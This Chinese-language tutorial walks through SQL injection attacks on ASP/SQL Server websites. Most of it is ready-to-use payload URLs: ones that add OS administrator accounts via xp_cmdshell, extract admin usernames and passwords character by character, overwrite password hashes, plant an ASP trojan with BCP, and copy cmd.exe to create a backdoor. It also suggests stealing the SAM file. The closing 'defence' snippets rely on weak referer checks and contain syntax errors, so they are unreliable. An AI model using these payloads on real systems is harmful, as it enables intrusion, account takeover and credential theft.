關於SQL註入

思路最重要。其實好多人都不知道SQL到底能做什麽呢？這裏總結壹下SQL註入入侵的總體的思路：

1. SQL註入漏洞的判斷，即尋找註入點

2. 判斷後臺數據庫類型

3. 確定XP_CMDSHELL可執行情況；若當前連接數據的帳號具有SA權限，且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程可以直接使用操作系統的shell)能夠正確執行，則整個計算機可以通過幾種方法完全控制，也就完成了整個註入過程，否則繼續：

1. 發現WEB虛擬目錄

2. 上傳ASP木馬；

3. 得到管理員權限

具體步驟：

壹、SQL註入漏洞的判斷

如果以前沒玩過註入，請把IE菜單-工具-Internet選項－高級－顯示友好HTTP錯誤信息前面的勾去掉。

為了把問題說明清楚，以下以/news.asp?id=xx(這個地址是假想的)，為例進行分析，xx可能是整型，也有可能是字符串。

1、整型參數的判斷

當輸入的參數xx為整型時，通常news.asp中SQL語句原貌大致如下：

select * from 表名 where 字段=xx，所以可以用以下步驟測試SQL註入是否存在。

最簡單的判斷方法

/news.asp?id=xx’(附加壹個單引號)，

此時news.asp中的SQL語句變成了

select * from 表名 where 字段=xx’，

如果程序沒有過濾好“’”的話，就會提示 news.asp運行異常；但這樣的方法雖然很簡單，但並不是最好的，因為：

first,不壹定每臺服務器的IIS都返回具體錯誤提示給客戶端，如果程序中加了cint(參數)之類語句的話，SQL註入是不會成功的，但服務器同樣會報錯，具體提示信息為處理 URL 時服務器上出錯。請和系統管理員聯絡。

second，目前大多數程序員已經將“’“ 過濾掉，所以用” ’”測試不到註入點，所以壹般使用經典的1=1和1=2測試方法，見下文：

/news.asp?id=xx and 1=1, news.asp運行正常，

而且與/news.asp?id=xx運行結果相同；

/news.asp?id=xx and 1=2, news.asp運行異常；（這就是經典的 1=1 1=2 判斷方法）

如果以上面滿足，news.asp中就會存在SQL註入漏洞，反之則可能不能註入。

2、字符串型參數的判斷

方法與數值型參數判斷方法基本相同

當輸入的參數xx為字符串時，通常news.asp中SQL語句原貌大致如下：

select * from 表名 where 字段='xx'，所以可以用以下步驟測試SQL註入是否存在。

/news.asp?id=xx’(附加壹個單引號)，此時news.asp中的SQL語句變成了

select * from 表名 where 字段=xx’，news.asp運行異常；

/news.asp?id=xx and '1'='1', news.asp運行正常，

而且與/news.asp?id=xx運行結果相同；

/news.asp?id=xx and '1'='2', news.asp運行異常；

如果以上滿足，則news.asp存在SQL註入漏洞，反之則不能註入

3、特殊情況的處理

有時ASP程序員會在程序員過濾掉單引號等字符，以防止SQL註入。此時可以用以下幾種方法試壹試。

①大小定混合法：由於VBS並不區分大小寫，而程序員在過濾時通常要麽全部過濾大寫字符串，要麽全部過濾小寫字符串，而大小寫混合往往會被忽視。如用SelecT代替select,SELECT等；

②UNICODE法：在IIS中，以UNICODE字符集實現國際化，我們完全可以IE中輸入的字符串化成UNICODE字符串進行輸入。如+ =%2B，空格=%20 等；URLEncode信息參見附件壹；

③ASCII碼法：可以把輸入的部分或全部字符全部

<4>出了上述方法以外，還有個更簡單的方法就是使用現成的工具像NB聯盟的NBSI就是壹款很不錯的工具，目前最新的版本為2.2

二、判斷數據庫類型

不同的數據庫的函數、註入方法都是有差異的，所以在註入之前，我們還要判斷壹下數據庫的類型。壹般ASP最常搭配的數據庫是Access和SQLServer，網上超過99%的網站都是其中之壹。

怎麽讓程序告訴妳它使用的什麽數據庫呢？來看看：

SQLServer有壹些系統變量，如果服務器IIS提示沒關閉，並且SQLServer返回錯誤提示的話，那可以直接從出錯信息獲取，方法如下：

/news.asp?id=xx;and user>0

這句語句很簡單，但卻包含了SQLServer特有註入方法的精髓，我自己也是在壹次無意的測試中發現這種效率極高的猜解方法。讓我看來看看它的含義：首先，前面的語句是正常的，重點在and user>0，我們知道，user是SQLServer的壹個內置變量，它的值是當前連接的用戶名，類型為nvarchar。拿壹個 nvarchar的值跟int的數0比較，系統會先試圖將nvarchar的值轉成int型，當然，轉的過程中肯定會出錯，SQLServer的出錯提示是：將nvarchar值 ”abc” 轉換數據類型為 int 的列時發生語法錯誤，呵呵，abc正是變量user的值，這樣，不廢吹灰之力就拿到了數據庫的用戶名。在以後的篇幅裏，大家會看到很多用這種方法的語句。 順便說幾句，眾所周知，SQLServer的用戶sa是個等同Adminstrators權限的角色，拿到了sa權限，幾乎肯定可以拿到主機的 Administrator了。上面的方法可以很方便的測試出是否是用sa登錄，要註意的是：如果是sa登錄，提示是將”dbo”轉換成int的列發生錯誤，而不是”sa”。

如果服務器IIS不允許返回錯誤提示，那怎麽判斷數據庫類型呢？我們可以從Access和SQLServer和區別入手，Access和 SQLServer都有自己的系統表，比如存放數據庫中所有對象的表，Access是在系統表[msysobjects]中，但在Web環境下讀該表會提示“沒有權限”，SQLServer是在表[sysobjects]中，在Web環境下可正常讀取。

在確認可以註入的情況下，使用下面的語句：

/news.asp?id=xx ;and (select count(*) from sysobjects)>0

/news.asp?id=xx ;and (select count(*) from msysobjects)>0

如果數據庫是SQLServer，那麽第壹個網址的頁面與原頁面/news.asp?id=xx是大致相同的；而第二個網址，由於找不到表msysobjects，會提示出錯，就算程序有容錯處理，頁面也與原頁面完全不同。

如果數據庫用的是Access，那麽情況就有所不同，第壹個網址的頁面與原頁面完全不同；第二個網址，則視乎數據庫設置是否允許讀該系統表，壹般來說是不允許的，所以與原網址也是完全不同。大多數情況下，用第壹個網址就可以得知系統所用的數據庫類型，第二個網址只作為開啟IIS錯誤提示時的驗證。

三、確定XP_CMDSHELL可執行情況

若當前連接數據的帳號具有SA權限，且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程可以直接使用操作系統的shell)能夠正確執行，則整個計算機可以通過以下幾種方法完全控制，以後的所有步驟都可以省

1、/news.asp?id=xx and user>;0 news.asp執行異常但可以得到當前連接數據庫的用戶名(若顯示dbo則代表SA)。

2、/news.asp?id=xx and db_name()>0 news.asp執行異常但可以得到當前連接的數據庫名。

3、/news.asp?id=xx；exec master..xp_cmdshell “net user aaa bbb /add”-- (master是SQL-SERVER的主數據

庫；名中的分號表示SQL-SERVER執行完分號前的語句名，繼續執行其後面的語句；“—”號是註解，表示其後面的所有內容僅為註釋，系統並不執行)可以直接增加操作系統帳戶aaa,密碼為bbb。

4、/news.asp?id=xx；exec master..xp_cmdshell “net localgroup administrators aaa /add”-- 把剛剛增加

的帳戶aaa加到administrators組中。

5、/news.asp?id=xx；backuup database 數據庫名 to disk='c:\inetpub\wwwroot\save.db' 則把得到的數據內容

全部備份到WEB目錄下，再用HTTP把此文件下載(當然首選要知道WEB虛擬目錄)。

6、通過復制CMD創建UNICODE漏洞

/news.asp?id=xx;exec master.dbo.xp_cmdshell “copy c:\winnt\system32\cmd.exe

c:\inetpub\scripts\cmd.exe” 便制造了壹個UNICODE漏洞，通過此漏洞的利用方法，便完成了對整個計算機的控制(當然首選要知道WEB虛擬目錄)。

這樣妳就成功的完成了壹次SQL註入攻擊，先別興奮，在實踐時妳就會發現這比理論要難的多會有更多的困難等著妳come over ，下面GO ON如果上述條件不成立則需繼續奮鬥（要掛馬了：））

GO ON~!

當上述條件不成立時就要繼續下面的步驟

(壹)、發現WEB虛擬目錄

只有找到WEB虛擬目錄，才能確定放置ASP木馬的位置，進而得到USER權限。有兩種方法比較有效。

壹是根據經驗猜解，壹般來說，WEB虛擬目錄是：c:\inetpub\wwwroot;

D:\inetpub\wwwroot; E:\inetpub\wwwroot等，而可執行虛擬目錄是：

c:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scripts等。

二是遍歷系統的目錄結構，分析結果並發現WEB虛擬目錄；

先創建壹個臨時表：temp

/news.asp?id=xx;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3

nvarchar(255));--

接下來：

1 我們可以利用xp_availablemedia來獲得當前所有驅動器,並存入temp表中：

/news.asp?id=xx;insert temp exec master.dbo.xp_availablemedia;--

我們可以通過查詢temp的內容來獲得驅動器列表及相關信息

2 我們可以利用xp_subdirs獲得子目錄列表,並存入temp表中：

/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--

3 我們還可以利用xp_dirtree獲得所有子目錄的目錄樹結構,並寸入temp表中：

/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

這樣就可以成功的瀏覽到所有的目錄（文件夾）列表：

如果我們需要查看某個文件的內容，可以通過執行xp_cmdsell：

/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--

使用'bulk insert'語法可以將壹個文本文件插入到壹個臨時表中。如：bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'

瀏覽temp就可以看到index.asp文件的內容了！通過分析各種ASP文件，可以得到大量系統信息，WEB建設與管理信息，甚至可以得到SA帳號的連接密碼。

當然，如果xp_cmshell能夠執行，我們可以用它來完成：

/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--

/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--

通過xp_cmdshell我們可以看到所有想看到的，包括W3svc

/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript

C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc'

但是，如果不是SA權限，我們還可以使用

/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

註意：

1、以上每完成壹項瀏覽後，應刪除TEMP中的所有內容，刪除方法是：

/news.asp?id=xx;delete from temp;--

2、瀏覽TEMP表的方法是：(假設TestDB是當前連接的數據庫名)

/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )>0

得到表TEMP中第壹條記錄id字段的值，並與整數進行比較，顯然news.asp工作異常，但在異常中卻可以發現id字段的值。假設發現的表名是xyz，則

/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )>0 where id not in('xyz'))>0

得到表TEMP中第二條記錄id字段的值。

(二)、上傳ASP木馬

所謂ASP木馬，就是壹段有特殊功能的ASP代碼，並放入WEB虛擬目錄的Scripts下，遠程客戶通過IE就可執行它，進而得到系統的USER權限，實現對系統的初步控制。上傳ASP木馬壹般有兩種比較有效的方法：

1、利用WEB的遠程管理功能

許多WEB站點，為了維護的方便，都提供了遠程管理的功能；也有不少WEB站點，其內容是對於不同的用戶有不同的訪問權限。為了達到對用戶權限的控制，都有壹個網頁，要求用戶名與密碼，只有輸入了正確的值，才能進行下壹步的操作,可以實現對WEB的管理，如上傳、下載文件，目錄瀏覽、修改配置等。

因此，若獲取正確的用戶名與密碼，不僅可以上傳ASP木馬，有時甚至能夠直接得到USER權限而瀏覽系統，上壹步的“發現WEB虛擬目錄”的復雜操作都可省略。

用戶名及密碼壹般存放在壹張表中，發現這張表並讀取其中內容便解決了問題。以下給出兩種有效方法。

A、 註入法：

從理論上說，認證網頁中會有型如：

select * from admin where username='XXX' and password='YYY' 的語句，若在正式運行此句之前，沒有進行必要的字符過濾，則很容易實施SQL註入。

如在用戶名文本框內輸入：abc’ or 1=1-- 在密碼框內輸入：123 則SQL語句變成：

select * from admin where username='abc’ or 1=1 and password='123’

不管用戶輸入任何用戶名與密碼，此語句永遠都能正確執行，用戶輕易騙過系統，獲取合法身份。

B、猜解法：

基本思路是：猜解所有數據庫名稱，猜出庫中的每張表名，分析可能是存放用戶名與密碼的表名，猜出表中的每個字段名，猜出表中的每條記錄內容。

a 猜解所有數據庫名稱

/news.asp?id=xx and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0

因為dbid的值從1到5，是系統用了。所以用戶自己建的壹定是從6開始的。並且我們提交了 name>1 (name字段是壹個字符型的字段和數字比較會出錯),news.asp工作異常，可得到第壹個數據庫名，同理把DBID分別改成7,8，9,10,11,12…就可得到所有數據庫名。

以下假設得到的數據庫名是TestDB。

b 猜解數據庫中用戶名表的名稱

猜解法：此方法就是根據個人的經驗猜表名，壹般來說，

user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,

systemusers,sysuser,sysusers,sysaccounts,systemaccounts等。並通過語句進行判斷

/news.asp?id=xx and (select count(*) from TestDB.dbo.表名)>0 若表名存在，則news.asp工作正常，否則異常。如此循環，直到猜到系統帳號表的名稱。

讀取法：SQL-SERVER有壹個存放系統核心信息的表sysobjects，有關壹個庫的所有表，視圖等信息全部存放在此表中，而且此表可以通過WEB進行訪問。

當xtype='U' and status>0代表是用戶建立的表，發現並分析每壹個用戶建立的表及名稱，便可以得到用戶名表的名稱，基本的實現方法是：

①/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 )>0

得到第壹個用戶建立表的名稱，並與整數進行比較，顯然news.asp工作異常，但在異常中卻可以發現表的名稱。假設發現的表名是xyz，則

②/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 and

name not in('xyz'))>0 可以得到第二個用戶建立的表的名稱，同理就可得到所有用建立的表的名稱。

根據表的名稱，壹般可以認定那張表用戶存放用戶名及密碼，以下假設此表名為Admin。

c 猜解用戶名字段及密碼字段名稱

admin表中壹定有壹個用戶名字段，也壹定有壹個密碼字段，只有得到此兩個字段的名稱，才有可能得到此兩字段的內容。如何得到它們的名稱呢，同樣有以下兩種方法。

猜解法：此方法就是根據個人的經驗猜字段名，壹般來說，用戶名字段的名稱常用：username,name,user,account等。而密碼字段的名稱常用：password,pass,pwd,passwd等。並通過語句進行判斷

/news.asp?id=xx and (select count(字段名) from TestDB.dbo.admin)>0 “select count(字段名) from 表名”

語句得到表的行數，所以若字段名存在，則news.asp工作正常，否則異常。如此循環，直到猜到兩個字段的名稱。

讀取法：基本的實現方法是

/news.asp?id=xx and (select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects)>0 。

select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects是從sysobjects得到已知表名的第壹個字段名，當與整數進行比較，顯然news.asp工作異常，但在異常中卻可以發現字段的名稱。把col_name(object_id('admin'),1)中的1依次換成2,3,4,5，6…就可得到所有的字段名稱。

d 猜解用戶名與密碼

猜用戶名與密碼的內容最常用也是最有效的方法有：

ASCII碼逐字解碼法:雖然這種方法速度較慢，但肯定是可行的。基本的思路是先猜出字段的長度，然後依次猜出每壹位的值。猜用戶名與猜密碼的方法相同，以下以猜用戶名為例說明其過程。

/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=X(X=1,2，3,4，5，… n，username

為用戶名字段的名稱，admin為表的名稱)，若x為某壹值i且news.asp運行正常時，則i就是第壹個用戶名的長度。如：當輸入

/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=8時news.asp運行正常，則第壹個用戶名的長度為8

/news.asp?id=xx and (select top 1 ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (m的值在1到上壹步得到的用戶名長度之間，當m=1，2,3，…時猜測分別猜測第1,2,3,…位的值；n的值是1~9、a~z、A~Z的ASCII值，也就是1~128之間的任意值；admin為系統用戶帳號表的名稱)，若n為某壹值i且news.asp運行正常時，則i對應ASCII碼就是用戶名某壹位值。如：當輸入

/news.asp?id=xx and (select top 1 ascii(substring(username,3,1)) from TestDB.dbo.admin)=80時news.asp運行正常，則用戶名的第三位為P(P的ASCII為80)；/news.asp?id=xx and (select top 1 ascii(substring(username,9,1)) from TestDB.dbo.admin)=33時news.asp運行正常，則用戶名的第9位為!(!的ASCII為80)；猜到第壹個用戶名及密碼後，同理，可以猜出其他所有用戶名與密碼。註意：有時得到的密碼可能是經MD5等方式加密後的信息，還需要用專用工具進行脫密。或者先改其密碼，使用完後再改回來，見下面說明。簡單法：猜用戶名用/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where username>1) , flag是admin表中的壹個字段，username是用戶名字段，此時news.asp工作異常，但能得到Username的值。與上同樣的方法，可以得到第二用戶名，第三個用戶等等，直到表中的所有用戶名。

猜用戶密碼：/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where pwd>1) , flag是admin表中的壹個字段，pwd是密碼字段，此時news.asp工作異常，但能得到pwd的值。與上同樣的方法，可以得到第二用戶名的密碼，第三個用戶的密碼等等，直到表中的所有用戶的密碼。密碼有時是經MD5加密的，可以改密碼。

/news.asp?id=xx;update TestDB.dbo.admin set pwd=' a0b923820dcc509a' where username='www';-- ( 1的MD5值為：AAABBBCCCDDDEEEF，即把密碼改成1；www為已知的用戶名)用同樣的方法當然可把密碼改原來的值。

2、利用表內容導成文件功能

SQL有BCP命令，它可以把表的內容導成文本文件並放到指定位置。利用這項功能，我們可以先建壹張臨時表，然後在表中壹行壹行地輸入壹個ASP木馬，然後用BCP命令導出形成ASP文件。

命令行格式如下：

bcp "select * from text..foo" queryout c:\inetpub\wwwroot\163.asp –c –S localhost –U sa –P foobar

('S'參數為執行查詢的服務器，'U'參數為用戶名，'P'參數為密碼，最終上傳了壹個163.asp的木馬)

3、利用工具，如NBSI給出的壹些參考數據最重要的表名：

select * from sysobjects

sysobjects ncsysobjects

sysindexes tsysindexes

syscolumns

systypes

sysusers

sysdatabases

sysxlogins

sysprocesses

最重要的壹些用戶名（默認sql數據庫中存在著的）

public

dbo

guest(壹般禁止，或者沒權限)

db_sercurityadmin

ab_dlladmin

壹些默認擴展

xp_regaddmultistring

xp_regdeletekey

xp_regdeletevalue

xp_regenumkeys

xp_regenumvalues

xp_regread

xp_regremovemultistring

xp_regwrite

xp_availablemedia 驅動器相關

xp_dirtree 目錄

xp_enumdsn ODBC連接

xp_loginconfig 服務器安全模式信息

xp_makecab 創建壓縮卷

xp_ntsec_enumdomains domain信息

xp_terminate_process 終端進程，給出壹個PID

(三)、得到系統的管理員權限

ASP木馬只有USER權限，要想獲取對系統的完全控制，還要有系統的管理員權限。怎麽辦？提升權限的方法有很多種：

上傳木馬，修改開機自動運行的.ini文件(它壹重啟，便死定了)；

復制CMD.exe到scripts，人為制造UNICODE漏洞；

下載SAM文件，破解並獲取OS的所有用戶名密碼；

等等，視系統的具體情況而定，可以采取不同的方法。

那麽我們怎麽防註入呢？程序如下加入到asp或html或php或cgi裏面都可以。經過測試。加入如 top.asp文件中開頭

方法壹：

<%if session("username"="" or session("userkey"="" then

response.redirect "../../"

end if%>

(說明：只要有用戶註入則跳轉到../../目錄，呵呵，看妳怎麽給我註入)

方法二：

<%

server_v1=Cstr(Request.ServerVariables("HTTP_REFERER")

server_v2=Cstr(Request.ServerVariables("SERVER_NAME")

if mid(server_v1,8,len(server_v2))<>server_v2 then

response.write "<br><br><center><table border=1 cellpadding=20 bordercolor=black bgcolor=#EEEEEE width=450>"

response.write "<tr><td style=“font:9pt Verdana">"

response.write "妳提交的路徑有誤，禁止從站點外部提交數據請不要亂該參數！"

response.write "</td></tr></table></center>"

response.end

end if

%>

(說明：只要有用戶註入則判斷為外部連接哦，呵呵，看妳怎麽給我註入)

方法三：

<% dim From_url,Serv_url

From_url = Cstr(Request.ServerVariables("HTTP_REFERER")

Serv_url = Cstr(Request.ServerVariables("SERVER_NAME")

if mid(From_url,8,len(Serv_url)) <> Serv_url then

response.write "NO"

response.redirect("../"

response.end

end if%>